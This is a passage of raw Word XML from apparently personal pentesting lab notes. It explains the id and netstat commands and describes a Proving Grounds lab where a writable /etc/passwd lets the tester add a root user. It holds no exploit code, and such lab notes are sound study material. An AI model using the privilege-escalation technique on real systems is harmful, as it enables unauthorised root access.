      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="260"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Inside the output should include the name of the file on the left, and you can use that for further inspection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000160A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000160B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding the id:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000160C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="241"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000160D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="241"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id command provides detailed information about the current user, including their user ID (UID), group ID (GID), and group memberships</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000160E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="241"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Example:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> uid=1000(mike) gid=1000(mike) groups=1000(mike),108(lxd)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000160F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="241"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">uid=1000(mike)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001610">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="128"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UID (User ID): The unique numeric identifier for the user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001611">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="128"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mike</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: The username associated with UID </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1000</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001612">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="128"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UID </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1000</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is typically the first regular user created on a system (e.g., during OS installation).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001613">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="987"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gid=1000(mike)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001614">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="109"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GID (Group ID): The unique numeric identifier for the user's primary group.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001615">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="109"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mike</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: The name of the group associated with GID </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1000</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001616">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="109"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">By default, a new user often gets a primary group with the same name as their username.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001617">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">groups=1000(mike),108(lxd)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001618">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="836"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Group Memberships: Lists all groups the user belongs to:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001619">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="836"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1000(mike): The user's primary group.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000161A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="836"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">108(lxd): A supplementary group the user is a member of. In this case, the lxd group, often used for managing LXD containers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000161B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016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1D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_2ipg2fsau8q" w:id="182"/>
      <w:bookmarkEnd w:id="182"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">netstat (to look at open ports)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000161E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000161F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">netstat -ano </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(for Linux, it would be</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> netstat -tulnp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">was used in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId430">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Nickel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice to find that port 80 was open even though the external NMAP scan said it was closed. This shows that internal netstat commands tell us a lot more than an external NMAP scan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001620">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-t</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: TCP connections</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001621">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-u</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: UDP connections</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001622">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-l</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Only show listening sockets</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001623">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-n</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Show numeric IP addresses and ports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001624">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-p</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Show the PID and program name of the process</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001625">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001626">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001627">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016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29">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_cpdwj96pzkfj" w:id="183"/>
      <w:bookmarkEnd w:id="183"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.bash_history</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000162A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000162B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId431">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Vegeta</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play, we looked at .bash_history, and saw that someone was trying to create a user Tom with root privileges and put it into /etc/passwd:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000162C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000162D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="939800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="171" name="image159.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image159.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId432"/>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62E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000162F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, this led us to investigate whether we had write privileges or not in /etc/passwd, and we ended having write privileges. So, we can just create any user we want, give it root privileges, and then log in as that user. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001630">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001631">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">More information with step-by-step process can be found in the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to add root user if /etc/passwd is writable</w:t>
      </w:r>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1632">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016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34">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001635">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7wx8275jufl6" w:id="184"/>
      <w:bookmarkEnd w:id="184"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
